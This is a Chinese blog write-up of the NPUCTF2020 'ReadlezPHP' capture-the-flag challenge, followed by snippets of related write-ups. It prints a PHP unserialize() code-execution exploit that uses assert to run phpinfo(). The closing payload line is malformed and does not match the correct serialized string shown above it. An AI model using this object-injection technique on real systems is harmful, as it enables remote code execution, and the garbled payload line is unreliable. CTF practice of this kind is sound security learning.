[NPUCTF2020]ReadlezPHP

最新推荐文章于 2025-02-11 11:56:13 发布
原创 最新推荐文章于 2025-02-11 11:56:13 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #网络安全 #web安全

本文分析了NPUCTF2020中ReadlezPHP题目存在的安全漏洞,通过构造恶意参数触发目标系统的反序列化操作,实现任意代码执行。文章详细介绍了如何利用__destruct魔术方法并绕过系统过滤,最终获取敏感信息。

[NPUCTF2020]ReadlezPHP

昨天休息,今天继续刷题在这里插入图片描述F12查看一下有什么东西能用没有,在这里插入图片描述发现新的页面,访问/time.php?source在这里插入图片描述

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

关键位置在class里销毁时执行的函数

public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }

这里当b=system,a=phpinfo()时,会执行函数查看到phpinfo界面,所以我们可以构造 获取HelloPhp类的序列化字符串:这里屏蔽了system,改用了assert

<?php  

class HelloPhp
{
    public $a = "phpinfo()";
    public $b = "assert";
}

$a = serialize(new HelloPhp);
echo $a;
?> 
结果:O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

payload:?data={s:1:“a”;s:9:“phpinfo()”;s:1:“b”;s:6:“assert”;}
这里在data传参的是因为@$ppp = unserialize($_GET["data"]);
在这里插入图片描述

[NPUCTF2020]EzRSA Writeup
bestkasscn的博客
12-02 740
[NPUCTF2020]EzRSA 题目描述 from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fl
BUUCTF--ReadlezPHP(反序列化简单应用)()
cainiao17441898的博客
08-15 321
目录扫描之后发现没有文件泄露。 查看一下源码发现了两个链接。 源码: PHP魔术方法:magic 这里eval没有用了不知道为啥(可能被过滤了吧)。 这里用了assert截断函数(作用跟eval差不多,eval里面的语句要以;结尾) 这里用蚁剑连接会连不上,就先查看一下phpinfo的信息。 生成payload: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function
2025.2.10——一、[NPUCTF2020]ReadlezPHP 反序列化|php代码审计|phpinfo
最新发布
2402_87387800的博客
02-11 1145
题目来源:BUUCTF [NPUCTF2020]ReadlezPHP
BUUCTF [NPUCTF2020]ReadlezPHP
qq_56313338的博客
08-15 195
进入页面后ctrl + u查看网页源代码发现一个链接进入链接发现源码一道关于反序列化的题题目很简单,就是执行一个可变函数。
127,【3】 buuctf [NPUCTF2020]ReadlezPHP
2402_87039650的博客
02-10 528
函数在 PHP 中既可以用于调试和检查条件是否成立,也可以将传入的参数当作 PHP 代码来执行。是 PHP 中的一个函数,其作用是执行外部程序,并将执行结果输出。我们需要通过get方式传参给data参数,并进行序列化操作。phpinfo() 函数用于输出 PHP 的配置信息。同时b包括函数名,a包括对应参数。此处就是利用了他的第二个性质。但尝试了不行,换一个。
NPUCTF2020]ReadlezPHP
Hopeace的博客
10-20 2952
[NPUCTF2020]ReadlezPHP0x01 浏览题目0x02 分析题目php @0x03 复现0x04 补充 作者:Hopeace 靶机地址:https://buuoj.cn/challenges#[NPUCTF2020]ReadlezPHP 0x01 浏览题目 主页和源代码都没有什么有用的信息 抓包试试response里有木有东西 http://www.nwpu.edu.cn 西工大的宣传页面,对此题属于无用信息 扫目录,没有结果 再仔细看一遍源代码 ctrl + f 搜索.php看有没有泄露的
[NPUCTF2020]ReadlezPHP 1
shinygod的博客
03-21 2298
知识点:assert和eval的不同 call_user_func 回调函数 分析 ctrl+u看源码 这题应该是要构造序列化来通过echo $b($a);拿flag,不过flag在phpinfo里我是真没想到。 payload 序列化: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this-&gt
[NPUCTF2020]ReadlezPHP1
kw741951的博客
08-07 571
此处未想到flag在phpinfo文件中,在网上才发现flag在phpinfo文件,因此构造序列化信息:O:8:"HelloPhp":2:{s:1:"a";ctrl+u查看源代码。看到php代码,打开。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值